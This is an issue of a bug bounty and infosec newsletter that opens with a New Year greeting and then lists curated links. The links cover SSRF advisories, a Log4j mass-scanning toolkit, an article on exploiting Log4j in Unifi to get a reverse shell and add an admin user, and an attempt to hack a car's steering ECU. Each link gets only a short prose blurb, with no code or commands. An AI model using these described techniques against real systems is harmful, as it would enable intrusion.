🐝 Hive Five 51 – Happy New Year

Hi friends,

Happy New Year from the hive!

I hope you'll get one step closer to reaching your dreams. Both professionally and personally, 2021 was a great year for me.

Through my newsletter, website, and job at Bugcrowd, I was able to meet, reach and help a lot of people. And it meant the world to me. There's no better feeling than giving back.

In 2021, I also gained new insight through introspection. I also found stoicism, or did it find me? I built a reading habit and started mind mapping. On the health front, I started a daily running habit. Lastly, I was lucky enough to meet with infosec friends, both old and new.

This year, I set out to improve the processes above while adding new ones for my overall goal to be more intentional and mindful.

Let's take this week by swarm!

🐝 The Bee's Knees

• What to Do Instead of New Years Resolutions.

• Ask TomNomNom anything: He'll do a stream some time in the next couple of weeks to do the answers. It was a 4 hour stream last time he did this.

• A Different Kind of Root - How a Dentist Passed the OSCP: TLDR - you can do it, there's no doubt about it. You just have to prep smart. Do the groundwork, jump into PWK, then finish up with PG. The exam is a psychological chess match between you and the machines.

• Turning bad SSRF to good SSRF - Websphere Portal: CVEs do not exist for these issues as the vendor is a CNA and refuses to provide us with CVEs. Advisory: Websphere Portal SSRFs & Post Auth RCE.

• Hacking a VW Golf Power Steering ECU - Part 1: Attempts at modifying the firmware of an Electronic Power Steering (EPS) ECU from a 2010 Volkswagen Golf Mk6. This steering rack is probably present in all VW PQ platform cars, starting from 2008 up to the present day.

🙏🏻 Support the Hive

• Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

Sponsor an issue

🔥 Buzzworthy

📅 Current events

• TOOOL needs your help: Someone defrauded them out of $20k, their bookkeeper ghosted them, and the bank isn't helpful.

• LogMePwn v2.0 - Multi-protocol support: A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.

🎉 Celebrate

• Dazzy is joining Mandiant Red Team: Congrats!

• Christopher's health journey: Amazing!

• MorningStar had a great bug bounty year: Awesome work!

• Six2dez celebrated reconFTW's first birthday: Here's to many more!

• ca$s:e crushed her goals: Let's go!

💰 Career Corner

• Canva has heaps of security roles open: They're looking for smart driven people that want to be a part of Canva's journey. Australia Remote - Happy to discuss remote international.

• Ben's advice to employers in the security space: There are barely any qualified and experienced people in this field. Only hiring experts is not sustainable.

• Advice for freelance web app security audit.

📰 Articles

• Secjuice 2021 Writer of the Year Winner - Andy From Italy: Secjuice is pleased to congratulate the 2021 winner of our annual Secjuice Writer of the Year awards, Andy From Italy.

• Another Log4j on the fire - Unifi: In this article, we are going to exploit Log4j vulnerabilities in Unifi software, get a reverse shell, and leverage our access to add our own administrative user to the Unifi MongoDB instance.

• Fixing the Unfixable - Story of a Google Cloud SSRF: The post is nominating for the 2021 GCP VRP Prize.

• Losers Exist, Don’t Hire Them: This is an internet re-post of a piece by Bryan Goldberg that is no longer available online.

• Spaceraccoon's 2Q21 - New Year's Reflections: “This may be the most important proposition revealed by history: 'At the time, no one knew what was coming.” ― Haruki Murakami.

📚 Resources

• What is your hunting on a public program mindset Mohsin asks.

• Introduction to Malware Analysis and Reverse Engineering: This class will introduce the CS graduate students to malware concepts, malware analysis, and black-box reverse engineering techniques.

• Blocksec CTFs: A curated list of blockchain security Wargames, Challenges, and Capture the Flag (CTF) competitions and solution writeups.

• Code Review Checklist: Does this code change accomplish what it is supposed to do? Can this solution be simplified?

• Hacking the Blockchain - An Ultimate Guide.

🎥 Videos

• Dropped or adopted in 2021… app and hardware end-of-year review.

• UHC - NodeBlog: Box will be uploaded to HackTheBox by January 5th.

• SSRF - Lab #5 SSRF with filter bypass via open redirection vulnerability | Long Version: This application's stock check feature is vulnerable to SSRF.

• Top 20 bug bounty YouTube channels to follow in 2021.

• Advanced Directory Traversal Techniques: This video covers advanced strategies to test for directory traversal issues.

🎵 Audio

• Spreading the Networking Vibes with Serena (shenetworks): Serena is a Network Engineer who specializes in Data Center Compute and Virtualization.

• Alice and Bob learn application security - Chapter 10 - Continuous learning conclusion.

Subscribe to Premium to read the rest.